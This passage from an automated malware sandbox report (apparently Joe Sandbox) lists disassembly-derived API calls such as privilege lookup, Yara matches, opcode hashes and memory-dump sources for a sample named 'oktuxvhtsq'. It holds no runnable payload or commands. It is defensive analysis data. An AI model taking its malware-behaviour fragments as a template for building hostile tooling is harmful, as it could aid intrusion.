                                  • Instruction Fuzzy Hash: 2DF0A9B12001446BEB14EF14CC89FEB3BA8EF8A314F108085FD4C9B242C534A9058BB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 279 41a623-41a647 call 41af20 281 41a64c-41a661 RtlFreeHeap 279->281
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 450c0ed355cb7b3709ac078d9ea1f7ab4aa96f1e572ba26de562b2ac3dea34c9
                                  • Instruction ID: 0611564a9146cbe0ee6bc4a384c8b6f7fa635fd505321bcb9219bc05b3340da6
                                  • Opcode Fuzzy Hash: 450c0ed355cb7b3709ac078d9ea1f7ab4aa96f1e572ba26de562b2ac3dea34c9
                                  • Instruction Fuzzy Hash: FDE0D8B51046845BDB01DF75D4D149737A5EF81318710954EF89947707C235C51ADBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 282 41a630-41a646 283 41a64c-41a661 RtlFreeHeap 282->283 284 41a647 call 41af20 282->284 284->283
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 285 41a790-41a7a9 286 41a7af-41a7c4 LookupPrivilegeValueW 285->286 287 41a7aa call 41af20 285->287 287->286
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A698
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =$www.$www.
                                  • API String ID: 0-3343787489
                                  • Opcode ID: 6d4ffc7fd2f7e5798f23f121e82b3a6d171adf2569ca5f4ed57d26bd2dac5154
                                  • Instruction ID: 068cf630603c46fe43a761a566bb2a59be3fbfb3dc0e4910e9399f7ca9c038ff
                                  • Opcode Fuzzy Hash: 6d4ffc7fd2f7e5798f23f121e82b3a6d171adf2569ca5f4ed57d26bd2dac5154
                                  • Instruction Fuzzy Hash: DFA1A6B6554344ABD714DBF0CCD1FEB737CAF44308F00465EB25A5B182DB78A6848BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                  • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                  • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                  • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                  • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                  • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                  • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                  • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                  • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                  • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                  • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                  • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                  • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                  • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                  • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                  • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                  • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                  • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                  • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                  • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                  • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                  • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                  • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                  • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                  • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                  • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                  • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                  • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                  • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                  • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                  • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                  • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                  • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                  • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                  • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                  • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                  • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
